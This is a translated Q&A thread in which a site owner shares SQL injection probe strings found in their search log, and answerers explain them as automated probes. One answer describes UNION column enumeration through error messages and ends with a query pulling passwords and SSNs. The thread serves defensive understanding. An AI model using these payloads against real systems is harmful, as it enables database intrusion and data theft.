因此,我们的网站上有一个搜索字段,我将所有的搜索词保存到数据库表中。
今天我打开了搜索词表,发现有一些奇怪的搜索,很明显有人在试图破坏我们的数据库。仅今天就有超过 200 次搜索。
它们似乎是一个主题的变奏:
999999.9) union all select 1 and (0=0
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39
999999.9 union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21)
999999.9 union all select 1
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39--
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39--
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39--
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39--
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39--
999999.9 union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21)--
999999.9 union all select 1--
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and "0"="0
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0
999999.9" /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and "0"="0
999999.9" union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and "0"="0
999999.9" union all select 1 and "0"="0
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and '0'='0
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0
999999.9' /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and '0'='0
999999.9' union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and '0'='0
999999.9' union all select 1 and '0'='0
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39 and (0=0)
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39 and (0=0)
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0)
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0)
999999.9) /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39,0x393133363636353631352e39 and (0=0)
999999.9) union all select /**/cOnCaT(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21) and (0=0)
999999.9) union all select 1 and (0=0)
999999.9 /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39
labor op99999' union select unhex(hex(version())) -- 'x'='x
labor op99999' union select unhex(hex(version())) -- 'x'='x
我们的站点搜索使用参数化查询,我尝试粘贴其中几个,所以我不认为他们得到任何东西,但我真的很好奇他们想要得到什么。
答案1
我真的很好奇他们想要得到什么。
一开始什么都没有。这些只是探测。它们只是试图看到您的服务产生意外结果,表明它无法处理输入。这里可能甚至没有真人在键盘前;它可能只是一个脚本,在尝试各种可能性。
然而,如果任何一次探测真的成功了,攻击的性质就会发生变化,你就会开始看到试图做一些更恶意的事情。
我不会等待这种情况发生,即使你确定这种情况不会发生。检查你的日志以查看攻击来自何处,如果可能的话,阻止该用户或 IP 查看你的系统。
答案2
提交union all子句会同时探测注入漏洞和查询结构。使用 postgres(因为我手头有这个):
(unknown website query)
/**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39
ERROR: each UNION query must have the same number of columns
LINE 2: /**/uNiOn /**/aLl /**/sElEcT 0x393133363636353631352e39
^
********** Error **********
ERROR: each UNION query must have the same number of columns
如果您的网站转发此错误消息,我将了解到 1) SQL 注入成功,并且 2) 未知网站查询选择了多个列。因此,现在我尝试使用两列、三列等等,直到收到不同的错误消息,例如:
ERROR: UNION types text and integer cannot be matched
LINE 2: /**/aLl /**/sElEcT 0x393133363636353631352e39, 0
现在我知道 SQL 注入是有效的,我也知道查询的 col_1 或 col_2 返回的是文本数据。很快我就会找出可能发生 SQL 注入的点、返回的列数以及每列的数据类型。
接下来,我可能会尝试从user可能存储有价值信息的常见表名中进行 UNION:
(unknown website query)
union all select user_id, password, ssn from user
黑客似乎还在检查是否可以注入注释语法:/**/和--。这很有用,因为它可能被用来通过注释掉和替换查询的部分内容来修改查询。
我猜这种不寻常的大写字母会让黑客更容易通过在网站响应中搜索该唯一字符串来自动查找漏洞。这里还有更多内容,我并不完全理解,但我希望这能让你大致了解你的网站是如何被探测的。